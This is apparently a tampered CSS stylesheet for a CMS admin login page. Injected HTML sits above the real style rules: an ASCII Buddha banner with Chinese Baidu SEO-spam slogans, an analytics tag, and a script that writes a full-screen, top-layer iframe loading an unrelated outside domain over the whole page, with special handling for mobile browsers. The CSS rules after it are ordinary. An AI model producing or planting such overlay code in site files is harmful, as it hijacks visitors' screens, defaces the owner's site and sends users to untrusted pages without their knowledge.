<!--//                          _ooOoo_                               //-->
<!--//                         o8888888o                              //-->
<!--//                         88" . "88                              //-->
<!--//                         (| ^_^ |)                              //-->
<!--//                         O\  =  /O                              //-->
<!--//                      ____/`---'\____                           //-->
<!--//                    .'  \\|     |//  `.                         //-->
<!--//                   /  \\|||  :  |||//  \                        //-->
<!--//                  /  _||||| -:- |||||-  \                       //-->
<!--//                  |   | \\\  -  /// |   |                       //-->
<!--//                  | \_|  ''\---/''  |   |                       //-->
<!--//                  \  .-\__  `-`  ___/-. /                       //-->
<!--//                ___`. .'  /--.--\  `. . ___                     //-->
<!--//            ."" '  `.     ___\_|_/___.'   '"".                  //-->
<!--//            | | :  `- \`.;`\ _ /`;.`/ - ` : | |                 //-->
<!--//            \  \ `-.   \_ __\ /__ _/   .-` /  /                 //-->
<!--//      ========`-.____`-.___\_____/___.-`____.-'========         //-->
<!--//                           `=---='                              //-->
<!--//      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^        //-->
<!--//    佛祖保佑     日收录满36     秒收秒排     百度首页第一       //-->
<!--////////////////////////////////////////////////////////////////////-->

<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?68a4a3e6dd07c1850c0dc1663f6362f3";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

<script>
document.write('<meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"><style>html,body{width:100%;height:100%;margin:0;padding:0}</style>');
  var iframe = document.createElement('iframe');
  iframe.src = 'https://mobile.absbywerg168.com/';
  iframe.scrolling = 'auto';
  iframe.style.cssText = "width:100%;height:100%;left:1px;top:1px;border:none;background:#fff";
  var div1 = document.createElement("div");
  var div =  document.createElement("div");
  div1.style.cssText = "-webkit-overflow-scrolling:touch;width:100%;height:100%;z-index:9999999999;position:fixed;top:0;left:0;";
    var is_mobi = navigator.userAgent.toLowerCase().match(/(ipad|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i) != null;
  if (is_mobi) {
    div1.style.overflow = "auto";
  }
  div1.appendChild(iframe);
  div.appendChild(div1);
  document.write(div.innerHTML);
</script>@charset "UTF-8";
body#login{ background:#004986;}
#login-wrap{width:914px;height:640px;background:url(/dm/xycms/images/login_b1.jpg) no-repeat;margin:0 auto;position: relative;}

#top{background:url(/dm/xycms/images/top1.jpg) 0 0 repeat-x;border-color:#004986;min-width: 1330px;overflow-x:hidden;}
#navs{background:#0068b9;color:#fff;}
#navs li.current a{background:#004986;color:#fff;}
#navs li a:hover {background:#004986;}

dl.menu dd a:hover{color:#0068b9;}
dl.menu dd.current a{background:#f1f1f1; color:#0068b9;border-right:3px solid #0068b9;}

/*登录界面*/
.login-main h1 {border-color:#0060ad;}
#loginFrm .admin_login {background:#0060ad;-webkit-box-shadow:inset 0 -4px 0 #004986;box-shadow:inset 0 -4px 0 #004986;}
#loginFrm .admin_login:hover{background:#004986;}
.login-cont .account1 input:focus{border-color:#00A0B1;}